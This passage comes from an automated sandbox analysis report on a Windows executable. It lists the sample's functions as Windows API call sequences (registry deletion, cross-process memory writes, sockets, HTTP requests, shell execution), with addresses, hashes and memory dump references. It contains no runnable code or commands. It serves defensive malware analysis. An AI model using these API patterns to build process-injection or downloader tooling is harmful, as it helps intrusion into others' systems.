                                                                                                • Instruction Fuzzy Hash: CC412571A002055FEB10DF65CD84AEE7774EF45304B10852EF609A7351E738EE46CB99
APIs
• GetPrivateProfileSectionW.KERNEL32(00000000,?,?,00007FFF), ref: 0045C44F
• GetPrivateProfileSectionW.KERNEL32(00000000,00000003,?,00000003), ref: 0045C477
• WritePrivateProfileSectionW.KERNEL32(00000000,00000003,?), ref: 0045C4C3
• WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0045C4E7
• WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0045C4F6
Memory Dump Source
• Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
Similarity
• API ID: PrivateProfile$SectionWrite$String
• String ID:
• API String ID: 2832842796-0
• Opcode ID: a5613791a7b7745f301c2db32c82459f4eb77f00fff265897707edd8741bbf57
• Instruction ID: 1eb5009190fa999c36a74edd43b7bd9b51adbc8f8691a9c3f5840d50e9073e8b
• Opcode Fuzzy Hash: a5613791a7b7745f301c2db32c82459f4eb77f00fff265897707edd8741bbf57
• Instruction Fuzzy Hash: D1413075A00209BFDB10EFA1DC85FAAB7A8BF44305F10855EF9049B292DA79EE44CB54
APIs
• RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00441CA9
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00441CDD
• RegCloseKey.ADVAPI32(?), ref: 00441CFE
• RegDeleteKeyW.ADVAPI32(?,?), ref: 00441D40
• RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00441D6E
Memory Dump Source
• Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
Similarity
• API ID: Enum$CloseDeleteOpen
• String ID:
• API String ID: 2095303065-0
• Opcode ID: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
• Instruction ID: 7ca4c7ada97503ad9332fce322fe5d5fc03c2789ff93db080e75f28165cdf273
• Opcode Fuzzy Hash: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
• Instruction Fuzzy Hash: 69317CB2940108BAEB10DBD4DC85FFEB77CEB49304F04456EF605A7241D774AA858BA8
APIs
• GetWindowRect.USER32(?,?), ref: 00436A24
Memory Dump Source
• Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
Similarity
• API ID: RectWindow
• String ID:
• API String ID: 861336768-0
• Opcode ID: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
• Instruction ID: 0a42da3bb0701689e96ef39581243ed39d97d4ba46bd7cd8c1f057aae640e0d3
• Opcode Fuzzy Hash: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
• Instruction Fuzzy Hash: E531EA7160021EAFDB00DF68D988AAE77A5EB49324F11C62AFD24E7380D774EC11CB90
APIs
• SendMessageW.USER32 ref: 00449598
  • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
• SendMessageW.USER32(?,00001074,?,?), ref: 004495F8
• _wcslen.LIBCMT ref: 0044960D
• _wcslen.LIBCMT ref: 0044961A
• SendMessageW.USER32(?,00001074,?,?), ref: 0044964E
Memory Dump Source
• Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
Similarity
• API ID: MessageSend$_wcslen$_wcspbrk
• String ID:
• API String ID: 1856069659-0
• Opcode ID: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
• Instruction ID: 683be220b4a5e9d86ccbf412c3bd2f13dbb60120779f28b1c577ab6eeef24407
• Opcode Fuzzy Hash: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
• Instruction Fuzzy Hash: 77318F71A00218ABEB20DF59DC80BDFB374FF94314F10466AFA0497280E7B59D958B94
APIs
• GetCursorPos.USER32(?), ref: 004478E2
• TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478FC
• DefDlgProcW.USER32(?,0000007B,?,?), ref: 0044791D
• GetCursorPos.USER32(00000000), ref: 0044796A
• TrackPopupMenuEx.USER32(00956420,00000000,00000000,?,?,00000000), ref: 00447991
Memory Dump Source
• Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
Similarity
• API ID: CursorMenuPopupTrack$Proc
• String ID:
• API String ID: 1300944170-0
• Opcode ID: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
• Instruction ID: 8079d3ea29232e2d8a780d7c6517a0c600664366e77620ab1eef72d1e193e80f
• Opcode Fuzzy Hash: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
• Instruction Fuzzy Hash: EF31CF75600108AFE724CF59DC88FABB768EB89310F20455AF94587391C775AC53CBA8
APIs
• GetClientRect.USER32(?,?), ref: 004479CC
• GetCursorPos.USER32(?), ref: 004479D7
• ScreenToClient.USER32(?,?), ref: 004479F3
• WindowFromPoint.USER32(?,?), ref: 00447A34
• DefDlgProcW.USER32(?,00000020,?,?), ref: 00447AAD
Memory Dump Source
• Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
Similarity
• API ID: Client$CursorFromPointProcRectScreenWindow
• String ID:
• API String ID: 1822080540-0
• Opcode ID: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
• Instruction ID: a7e7621e8492875af53c289f1ad187460d50aec5ad556b3834d9a5cb4abdf121
• Opcode Fuzzy Hash: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
• Instruction Fuzzy Hash: B831A2741082029FE710DF69D884D7FB7A4FB89314F144A1EF850D7291D774E946CBA6
APIs
• GetWindowRect.USER32(?,?), ref: 00447C5D
• ScreenToClient.USER32(?,?), ref: 00447C7B
• SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
• Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
• EndPaint.USER32(?,?), ref: 00447D13
Memory Dump Source
• Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
Similarity
• API ID: ClientPaintRectRectangleScreenViewportWindow
• String ID:
• API String ID: 659298297-0
• Opcode ID: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
• Instruction ID: 3c0582d8bc81ba5dadaaf244cb1f1d3939805113443e317e1f98b5bdeebaec33
• Opcode Fuzzy Hash: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
• Instruction Fuzzy Hash: C33161706043019FE310CF25D8C8F7B7BE8EB86724F144A6EF9A5872A1C774A845DB69
APIs
• EnableWindow.USER32(?,00000000), ref: 00448B5C
• EnableWindow.USER32(?,00000001), ref: 00448B72
• ShowWindow.USER32(?,00000000), ref: 00448BE8
• ShowWindow.USER32(?,00000004), ref: 00448BF4
• EnableWindow.USER32(?,00000001), ref: 00448C09
  • Part of subcall function 00440D98: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00440DB8
  • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440DFA
  • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440E3A
  • Part of subcall function 00440D98: SendMessageW.USER32(00951BD8,000000F1,00000000,00000000), ref: 00440E6E
  • Part of subcall function 00440D98: SendMessageW.USER32(00951BD8,000000F1,00000001,00000000), ref: 00440E9A
Memory Dump Source
• Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
Similarity
• API ID: Window$EnableMessageSend$LongShow
• String ID:
• API String ID: 142311417-0
• Opcode ID: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
• Instruction ID: c941ec4e4e3d0536419715940b2668e48b64c275bb9f23e9dd6fd7b29375311a
• Opcode Fuzzy Hash: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
• Instruction Fuzzy Hash: DE21F7B17443805BF7258E24CCC4BAFB7D0EF56345F08482EF98196391DBACA885C75A
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                APIs
                                                                                                • IsWindowVisible.USER32(?), ref: 00445879
                                                                                                • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00445893
                                                                                                • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004458CD
                                                                                                • _wcslen.LIBCMT ref: 004458FB
                                                                                                • CharUpperBuffW.USER32(00000000,00000000), ref: 00445905
                                                                                                Similarity
                                                                                                • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
                                                                                                • String ID:
                                                                                                • API String ID: 3087257052-0
                                                                                                APIs
                                                                                                  • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                                                                                • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 004653FE
                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 0046540D
                                                                                                • connect.WSOCK32(00000000,?,00000010), ref: 00465446
                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 0046546D
                                                                                                • closesocket.WSOCK32(00000000,00000000), ref: 00465481
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$closesocketconnectinet_addrsocket
                                                                                                • String ID:
                                                                                                • API String ID: 245547762-0
                                                                                                APIs
                                                                                                • DeleteObject.GDI32(00000000), ref: 004471D8
                                                                                                • ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                                                • SelectObject.GDI32(?,00000000), ref: 00447228
                                                                                                • BeginPath.GDI32(?), ref: 0044723D
                                                                                                • SelectObject.GDI32(?,00000000), ref: 00447266
                                                                                                Similarity
                                                                                                • API ID: Object$Select$BeginCreateDeletePath
                                                                                                • String ID:
                                                                                                • API String ID: 2338827641-0
                                                                                                APIs
                                                                                                • Sleep.KERNEL32(00000000), ref: 00434598
                                                                                                • QueryPerformanceCounter.KERNEL32(?), ref: 004345B5
                                                                                                • Sleep.KERNEL32(00000000), ref: 004345D4
                                                                                                • QueryPerformanceCounter.KERNEL32(?), ref: 004345DE
                                                                                                Similarity
                                                                                                • API ID: CounterPerformanceQuerySleep
                                                                                                • String ID:
                                                                                                • API String ID: 2875609808-0
                                                                                                APIs
                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00460C17
                                                                                                • GetWindowTextW.USER32(00000000,?,00000100), ref: 00460C2E
                                                                                                • MessageBeep.USER32(00000000), ref: 00460C46
                                                                                                • KillTimer.USER32(?,0000040A), ref: 00460C68
                                                                                                • EndDialog.USER32(?,00000001), ref: 00460C83
                                                                                                Similarity
                                                                                                • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                • String ID:
                                                                                                • API String ID: 3741023627-0
                                                                                                APIs
                                                                                                Similarity
                                                                                                • API ID: Destroy$DeleteObjectWindow$Icon
                                                                                                • String ID:
                                                                                                • API String ID: 4023252218-0
                                                                                                APIs
                                                                                                • SendMessageW.USER32(?,00001101,00000000,?), ref: 004555FC
                                                                                                • DeleteObject.GDI32(?), ref: 00455736
                                                                                                • DeleteObject.GDI32(?), ref: 00455744
                                                                                                • DestroyIcon.USER32(?), ref: 00455752
                                                                                                • DestroyWindow.USER32(?), ref: 00455760
                                                                                                Similarity
                                                                                                • API ID: DeleteDestroyObject$IconMessageSendWindow
                                                                                                • String ID:
                                                                                                • API String ID: 1489400265-0
                                                                                                APIs
                                                                                                  • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                                                                                • DestroyWindow.USER32(?), ref: 00455728
                                                                                                • DeleteObject.GDI32(?), ref: 00455736
                                                                                                • DeleteObject.GDI32(?), ref: 00455744
                                                                                                • DestroyIcon.USER32(?), ref: 00455752
                                                                                                • DestroyWindow.USER32(?), ref: 00455760
                                                                                                Similarity
                                                                                                • API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
                                                                                                • String ID:
                                                                                                • API String ID: 1042038666-0
                                                                                                APIs
                                                                                                • __getptd.LIBCMT ref: 0041780F
                                                                                                  • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                                                                                  • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                                                                                • __getptd.LIBCMT ref: 00417826
                                                                                                • __amsg_exit.LIBCMT ref: 00417834
                                                                                                • __lock.LIBCMT ref: 00417844
                                                                                                • __updatetlocinfoEx_nolock.LIBCMT ref: 00417858
                                                                                                Similarity
                                                                                                • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                • String ID:
                                                                                                • API String ID: 938513278-0
                                                                                                APIs
                                                                                                  • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                                                                                                • ___set_flsgetvalue.LIBCMT ref: 00413D20
                                                                                                  • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                                                  • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                                                • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                                                                                                  • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                                                • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                                                                                                • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                                                                                                • ExitThread.KERNEL32 ref: 00413D4E
                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00413D54
                                                                                                • __freefls@4.LIBCMT ref: 00413D74
                                                                                                Similarity
                                                                                                • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                                                • String ID:
                                                                                                • API String ID: 2403457894-0
                                                                                                APIs
                                                                                                  • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                                                                                                • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                                                                                  • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                                                  • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                                                • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                                                                                  • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                                                • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                                                                                • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                                                                                • ExitThread.KERNEL32 ref: 004151ED
                                                                                                • __freefls@4.LIBCMT ref: 00415209
                                                                                                Similarity
                                                                                                • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                                                • String ID:
                                                                                                • API String ID: 4247068974-0
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: )$U$\
                                                                                                • API String ID: 0-3705770531
                                                                                                APIs
                                                                                                  • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                                                                                • CoInitialize.OLE32(00000000), ref: 0046E505
                                                                                                • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0046E51E
                                                                                                • CoUninitialize.OLE32 ref: 0046E53D
                                                                                                Similarity
                                                                                                • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                • String ID: .lnk
                                                                                                • API String ID: 886957087-24824748
                                                                                                Similarity
                                                                                                • API ID: _memmove
                                                                                                • String ID: \
                                                                                                • API String ID: 4104443479-2967466578
                                                                                                Similarity
                                                                                                • API ID: _memmove
                                                                                                • String ID: \
                                                                                                • API String ID: 4104443479-2967466578
                                                                                                • Opcode ID: aaea77048b6460e77790bc9063151364371e311f89c51572a31744d174c5d814
                                                                                                • Instruction ID: 47d8400a167da4587eb122393216330e55bf30386b581c043e0675457d4a745f
                                                                                                • Opcode Fuzzy Hash: aaea77048b6460e77790bc9063151364371e311f89c51572a31744d174c5d814
                                                                                                • Instruction Fuzzy Hash: F1B1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED451AB381D7795946CB1A
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                 • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: _memmove
                                                                                                • String ID: \
                                                                                                • API String ID: 4104443479-2967466578
                                                                                                • Opcode ID: 51371dbcd6d614fdce5bfd4d2520a50a5cfc61004088100711ab8bbb78939718
                                                                                                • Instruction ID: 4d1558bed40bbae7f26d93592334ac0d2c658ca85fbb7fec499742c135aa7d63
                                                                                                • Opcode Fuzzy Hash: 51371dbcd6d614fdce5bfd4d2520a50a5cfc61004088100711ab8bbb78939718
                                                                                                • Instruction Fuzzy Hash: E5A1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED441AB381D7795946CB1A
                                                                                                Strings
                                                                                                • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0046A75B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                 • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: _memmovestd::exception::exception$Exception@8Throw_malloc_wcslen
                                                                                                • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                                • API String ID: 708495834-557222456
                                                                                                • Opcode ID: 0835c6591df01f69715f5e8aca6b92cd03353c77de4b2b2244ddd74c7a14709d
                                                                                                • Instruction ID: 9c514e09f8cb76db8ae150367893d7536957bb5c5403f45e3580b17af89e858a
                                                                                                • Opcode Fuzzy Hash: 0835c6591df01f69715f5e8aca6b92cd03353c77de4b2b2244ddd74c7a14709d
                                                                                                • Instruction Fuzzy Hash: 7C917F711087009FC310EF65C88186BB7E8AF89314F148D2FF595672A2E778E919CB9B
                                                                                                APIs
                                                                                                  • Part of subcall function 00434319: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043434A
                                                                                                • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 004365EF
                                                                                                  • Part of subcall function 004342DD: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043430E
                                                                                                  • Part of subcall function 004343AD: GetWindowThreadProcessId.USER32(?,?), ref: 004343E0
                                                                                                  • Part of subcall function 004343AD: OpenProcess.KERNEL32(00000438,00000000,?), ref: 004343F1
                                                                                                  • Part of subcall function 004343AD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004), ref: 00434408
                                                                                                • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0043665F
                                                                                                • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 004366DF
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                 • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                • String ID: @
                                                                                                • API String ID: 4150878124-2766056989
                                                                                                • Opcode ID: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                                                                                • Instruction ID: 60a9f40d71a87185ad744a771aacdfc79ad0a16393efc777ae91d2f205fac39b
                                                                                                • Opcode Fuzzy Hash: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                                                                                • Instruction Fuzzy Hash: 0D51B972A00218ABCB10DFA5DD42FDEB778EFC9304F00459AFA05EB180D6B4BA45CB65
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                 • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: _memmove
                                                                                                • String ID: \$]$h
                                                                                                • API String ID: 4104443479-3262404753
                                                                                                • Opcode ID: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                                                                                                • Instruction ID: f8aecd1968ad4f88b1990a67d2c0a139cd5c037738d7fdf96801fcbc28408ccb
                                                                                                • Opcode Fuzzy Hash: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                                                                                                • Instruction Fuzzy Hash: 97518470E00209DFDF18CFA5C980AAEB7F2BF85304F29826AD405AB355D7385D45CB55
                                                                                                APIs
                                                                                                • ShellExecuteExW.SHELL32(0000003C), ref: 00457D67
                                                                                                  • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                                                  • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                                                • CloseHandle.KERNEL32(?), ref: 00457E09
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                 • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: CloseExecuteHandleShell_wcscpy_wcslen
                                                                                                • String ID: <$@
                                                                                                • API String ID: 2417854910-1426351568
                                                                                                • Opcode ID: 456975d6943100b9bccf6a944bdff1bb50055e47ea808eda8884d41227499f4e
                                                                                                • Instruction ID: b88a15a70aa0ad5f6f29005b2a8070d35214d1ef645994392ec84fe4d9ca6df0
                                                                                                • Opcode Fuzzy Hash: 456975d6943100b9bccf6a944bdff1bb50055e47ea808eda8884d41227499f4e
                                                                                                • Instruction Fuzzy Hash: C751D3719002089BDB10EFA1D985AAFB7B4EF44309F10446EED05AB352DB79ED49CB94
                                                                                                APIs
                                                                                                • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A87A
                                                                                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A8C9
                                                                                                • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0044A901
                                                                                                  • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                 • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
